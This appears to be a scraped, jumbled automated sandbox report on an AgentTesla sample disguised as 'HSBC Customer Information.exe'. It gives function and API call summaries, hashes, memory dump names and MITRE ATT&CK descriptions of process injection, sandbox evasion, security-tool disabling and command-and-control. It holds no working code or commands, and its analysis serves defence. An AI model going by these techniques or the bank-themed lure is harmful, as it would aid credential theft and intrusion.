Opcode Fuzzy Hash: 22fbc4f28f525929b5c12ac0747ba9008e44ff7478529d79729aa2372ccc0f16
Instruction Fuzzy Hash: 49428334A102098BCB04CF98C595ADDF3B1BF48304F24D26AD9257B365E771A946CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00419000, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

#598.MSVBVM60 ref: 0041905B
__vbaVarDup.MSVBVM60 ref: 00419083
#632.MSVBVM60(?,?,00000002,00000002), ref: 00419097
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 004190BC
__vbaFreeVarList.MSVBVM60(00000003,?,00000002,?), ref: 004190D3
#554.MSVBVM60 ref: 004190E5
__vbaOnError.MSVBVM60(00000000), ref: 004190EC
__vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 00419104
__vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,0000004C), ref: 00419129
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D4C4,00000024), ref: 00419157
__vbaStrMove.MSVBVM60 ref: 00419166
__vbaFreeObj.MSVBVM60 ref: 0041916F
__vbaFreeStr.MSVBVM60(004191B4), ref: 004191AD

Strings

Bageevnes4, xrefs: 0041913A
ANFLJNES, xrefs: 0041913F

Memory Dump Source

Source File: 00000000.00000002.591272798.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.591259855.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.591326633.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.591343142.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#554#598#632ErrorListMoveNew2
String ID: ANFLJNES$Bageevnes4
API String ID: 1363981936-648517204
Opcode ID: 991f5f2d640ac593d17d9036a01c29d17c1a7cea7e80638b0465890b0a294de9
Instruction ID: 9b5e1a3def9e682a9846f4dbae0801cb75faf5d1e32616014f77c334ff520968
Opcode Fuzzy Hash: 991f5f2d640ac593d17d9036a01c29d17c1a7cea7e80638b0465890b0a294de9
Instruction Fuzzy Hash: 1C412D71D00258AFDB10DFD4DA49ADDBBB8FB48B00F20851AF505B72A1C7785A49CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00411DE0, Relevance: 16.6, APIs: 11, Instructions: 100COMMON

Download Yara Rule

APIs

#685.MSVBVM60 ref: 00411E17
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411E22
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040D664,0000001C), ref: 00411E49
__vbaFreeObj.MSVBVM60 ref: 00411E65
#593.MSVBVM60(?), ref: 00411E86
__vbaFreeVar.MSVBVM60 ref: 00411E91
__vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 00411EA9
__vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000014), ref: 00411ECE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D4B4,000000B8), ref: 00411EF4
__vbaFreeObj.MSVBVM60 ref: 00411EF9
#570.MSVBVM60(00000035), ref: 00411F01

Memory Dump Source

Source File: 00000000.00000002.591272798.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.591259855.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.591326633.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.591343142.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$#570#593#685New2
String ID:
API String ID: 2374434628-0
Opcode ID: c86b08fdccf1781112ac0fbb660d04c2f1e601afe609297c30212b60d7c4bea7
Instruction ID: 2d3ab4484c85faee385e553c25c4ae2ba5d45658cfd2481dcc1f902c84381c1a
Opcode Fuzzy Hash: c86b08fdccf1781112ac0fbb660d04c2f1e601afe609297c30212b60d7c4bea7
Instruction Fuzzy Hash: 46317071900218AFCB10AFA4DD89EDEBBB8FF08740F24452AF605B71A0D7785485CB68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 6140 Parent PID: 6392 RegAsm.exeCOMMON

Executed Functions

Function 1DD75184, Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DD752A2

Memory Dump Source

Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6b58c4ad359cdee73757472c3108f12da545007ee7a1cbf4a8816d7c7149142b
Instruction ID: 11062906f4846d98aac3095dc42089a12b1af6c9f881bd2caf94f2dc7a345ad5
Opcode Fuzzy Hash: 6b58c4ad359cdee73757472c3108f12da545007ee7a1cbf4a8816d7c7149142b
Instruction Fuzzy Hash: D351DFB1D103499FDB14CF99C884ADEBBB5FF48314F60862AE819AB210D771A885CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1DD73C7C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DD752A2

Memory Dump Source

Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c25b5a8e84311077696dcac20a23af3e74902d0b13f3d8788ef8e828b8199a0f
Instruction ID: d84dba00098d034f2a4b694063fe61d77399f380519632406833fa9d1ec1259b
Opcode Fuzzy Hash: c25b5a8e84311077696dcac20a23af3e74902d0b13f3d8788ef8e828b8199a0f
Instruction Fuzzy Hash: 8651DEB1D00349DFDB14CF99C884ADEBBB5FF48314F60826AE819AB210D775A845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1DD76964, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 1DD77CF9

Memory Dump Source

Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 5d5184030c69f8d93f51502a3eeb71fa53a5614162b7e15653607decea1281f3
Instruction ID: 2e30d6abf96f5c97ca81d515f651eb5010a0c494ac08ab858921e403b6d85829
Opcode Fuzzy Hash: 5d5184030c69f8d93f51502a3eeb71fa53a5614162b7e15653607decea1281f3
Instruction Fuzzy Hash: 0B414CB4900349DFDB14CF99C884BAABBF5FF88314F15C899E419AB321D374A845CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1DD76D72, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DD76DFF

Memory Dump Source

Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d864f4c84ccf94fda7211a48a7d6bf79fd23efc5663f3b7274118e2d08c39be8
Instruction ID: 7764220067755aa91e7be581ff0d44e7b11edadca4f7513174d52082f4755137
Opcode Fuzzy Hash: d864f4c84ccf94fda7211a48a7d6bf79fd23efc5663f3b7274118e2d08c39be8
Instruction Fuzzy Hash: 242123B5D002489FDB10CFA9D884AEEBFF5FB48314F14846AE814A7310D374AA54CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1DD76D78, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DD76DFF

Memory Dump Source

Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e50a53022193747d1bbaeb74c66e79a4232fcbda73a27ace80b6d0fa99c04f29
Instruction ID: d5edb4036d28178ef6a55562edfbe4c5eb3ae055838c7a314a204c65b9b8a2a6
Opcode Fuzzy Hash: e50a53022193747d1bbaeb74c66e79a4232fcbda73a27ace80b6d0fa99c04f29
Instruction Fuzzy Hash: 5021F3B5D002089FDB00CFA9D884AEEBBF8FB48324F14841AE914A7310D375A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 1DD7BDE8, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 1DD7BE72

Memory Dump Source

Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: dfa2806a855b11a86b2f5469c5364806f296764fa2a8313dff4af75cb4071a54
Instruction ID: 64b2f3dbb70188408027c311bafd1f283b5780df01a8b393b4d89297fa901491
Opcode Fuzzy Hash: dfa2806a855b11a86b2f5469c5364806f296764fa2a8313dff4af75cb4071a54
Instruction Fuzzy Hash: 2721A77090478A8FDB10DFA9C808BDEBBB0EB0A314F1484AAE449A3652C3386505CF66

Uniqueness

Uniqueness Score: -1.00%

Function 1DD7BDF8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 1DD7BE72

Memory Dump Source

Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: f700763502f1aff0c07200828c21f4cef86b527fee3a168e8f5ba80cea6b6994
Instruction ID: 9d12a5cbb5969ce7ddc0ed1a40c9eb6d3e4fa734a6611d2bcfb32d108270412c
Opcode Fuzzy Hash: f700763502f1aff0c07200828c21f4cef86b527fee3a168e8f5ba80cea6b6994
Instruction Fuzzy Hash: 2311597090074A8FEB10DFA9C84879EBBF4FB05324F148469E509A3711C77965458FA6

Uniqueness

Uniqueness Score: -1.00%

Function 1DC6D53C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.737970165.000000001DC6D000.00000040.00000001.sdmp, Offset: 1DC6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29155f34bb7ff509e9546e67bff19ae49e62787c81482954ef1a239bfb166f3c
Instruction ID: b35db4128990eda42459a47918951b02dd70926560ca36135ce7e004ed8431f1
Opcode Fuzzy Hash: 29155f34bb7ff509e9546e67bff19ae49e62787c81482954ef1a239bfb166f3c
Instruction Fuzzy Hash: 7D2136B2504249EFDB01CF48D8C0B56BB65FB84328F208D69E8094B746C376D486CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 1DC7D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.738011451.000000001DC7D000.00000040.00000001.sdmp, Offset: 1DC7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d507503b8ed30c30eec60123662c76d80196aea3ad0395baaefc9c3b1f1d7a9f
Instruction ID: 79899ae7323a5db21b9bda9671b3b0c90ea519f8b8e412d4f9ff71ae7beba2e9
Opcode Fuzzy Hash: d507503b8ed30c30eec60123662c76d80196aea3ad0395baaefc9c3b1f1d7a9f
Instruction Fuzzy Hash: EA21FF76504348EFDB01CF28D9C4B56BBA5FB84724F20CDA9E8094B346C33AD807CA62

Uniqueness

Uniqueness Score: -1.00%

Function 1DC7D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.738011451.000000001DC7D000.00000040.00000001.sdmp, Offset: 1DC7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c98b467af9db8782998001933f4ba493972875da9f0388f602152c304ec3351
Instruction ID: ec6dd513dc40ebc8da82c39a6193015e012c8c2bcfe281ce9adf52b7dc6e020c
Opcode Fuzzy Hash: 4c98b467af9db8782998001933f4ba493972875da9f0388f602152c304ec3351
Instruction Fuzzy Hash: C5216F76508784DFD702CF24D994B11BF71EB46314F28C9AAD8498B296C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DC6D537, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.737970165.000000001DC6D000.00000040.00000001.sdmp, Offset: 1DC6D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e0ed30b94768c72e950e72b4885edf646e8678239feb31375ccb2b45c20f757
Instruction ID: 2a909dd234c6c6c6f457f5c8adb7e32ddb7795ffb2b98f8871327a71ee0c46b8
Opcode Fuzzy Hash: 3e0ed30b94768c72e950e72b4885edf646e8678239feb31375ccb2b45c20f757
Instruction Fuzzy Hash: 4411D3B6404285CFDB02CF14D9C0B16BF72FB84324F24CAA9D8094B756C336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report HSBC Customer Information.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Code Manipulations

Statistics

Function 004017AC, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 592
COMMONCrypto